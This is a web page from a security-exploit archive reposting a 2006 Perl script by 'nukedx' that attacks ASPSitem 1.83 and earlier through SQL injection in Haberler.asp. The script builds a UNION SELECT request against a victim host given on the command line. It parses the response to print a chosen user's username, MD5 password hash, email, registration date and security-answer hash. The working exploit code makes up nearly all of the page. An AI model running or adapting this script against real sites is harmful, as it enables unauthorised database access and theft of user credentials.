首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 ASPSitem <= 1.83 (Haberler.asp) Remote SQL Injection Exploit 来源：www.nukedx.com 作者：nukedx 发布时间：2006-04-20   #!/usr/bin/perl #Method found & Exploit scripted by nukedx #Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com #Original advisory: http://www.nukedx.com/?viewdoc=23 #Usage: aspsi.pl <host> <path> use IO::Socket; if(@ARGV != 3) { usage(); } else { exploit(); } sub header() { print "\n- NukedX Security Advisory Nr.2006-23\r\n"; print "- ASPSitem <= 1.83 Remote SQL Injection Exploit\r\n"; } sub usage() { header(); print "- Usage: $0 <host> <path>\r\n"; print "- <host> -> Victim's host ex: www.victim.com\r\n"; print "- <path> -> Path to ASPSitem ex: /aspsitem/\r\n"; exit(); } sub exploit () { #Our variables... $asserver = $ARGV[0]; $asserver =~ s/(http:\/\/)//eg; $ashost = "http://".$asserver; $asdir = $ARGV[1]; $asport = "80"; $astar = "Haberler.asp?haber=devam&id="; $asxp = "-1%20UNION%20SELECT%20cevap,id,0,kulladi,sifre,kayittarih,email%20FROM%20uyeler%20where%20id%20like%20".$ARGV[2]; $asreq = $ashost.$asdir.$astar.$asxp; #Sending data... header(); print "- Trying to connect: $asserver\r\n"; $as = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$asserver", PeerPort => "$asport") || die "- Connection failed...\n"; print $as "GET $asreq HTTP/1.1\n"; print $as "Accept: */*\n"; print $as "Referer: $ashost\n"; print $as "Accept-Language: tr\n"; print $as "User-Agent: NukeZilla\n"; print $as "Cache-Control: no-cache\n"; print $as "Host: $asserver\n"; print $as "Connection: close\n\n"; print "- Connected...\r\n"; while ($answer = <$as>) { if ($answer =~ /class=\"tablo_baslik\"><b>» (.*?)<\/b><\/td>/) { if ($1 == $ARGV[2]) { print "- Exploit succeed! Getting USERID: $ARGV[2]'s credentials\r\n"; } else { die "- Exploit failed\n"; } } if ($answer =~ /\" align=\"left\">(.*?)</) { print "- Username: $1\r\n"; } if ($answer =~ /Ekleyen  \(<b>(.*?)<\/b>\)/) { print "- MD5 HASH of PASSWORD: $1\r\n"; } if ($answer =~ /\| (.*?) ]<br>/) { print "- Regdate: $1\r\n"; } if ($answer =~ /haber=yorum&id=(.*?)\">Yorumlar/) { print "- Email: $1\r\n"; } if ($answer =~ / Okunma : (.*?) /) { print "- MD5 hash of answer: $1\r\n"; exit(); } } #Exploit failed... print "- Exploit failed\n" }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·PHP Net Tools <= 2.7.1 Remo ·Mambo <= 4.5.3 , Joomla < ·Internet PhotoShow (page) Remo ·PCPIN Chat <= 5.0.4 (login/ ·Neon Responder 5.4 (Clock Sync ·PHPSurveyor <= 0.995 (surve ·FlexBB <= 0.5.5 (/inc/start ·My Gaming Ladder Combo System ·Blackorpheus ClanMemberSkript ·Apple Mac OS X Safari <= 2. ·Microsoft IIS ASP Stack Overfl ·FlexBB <= 0.5.5 (function/s   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved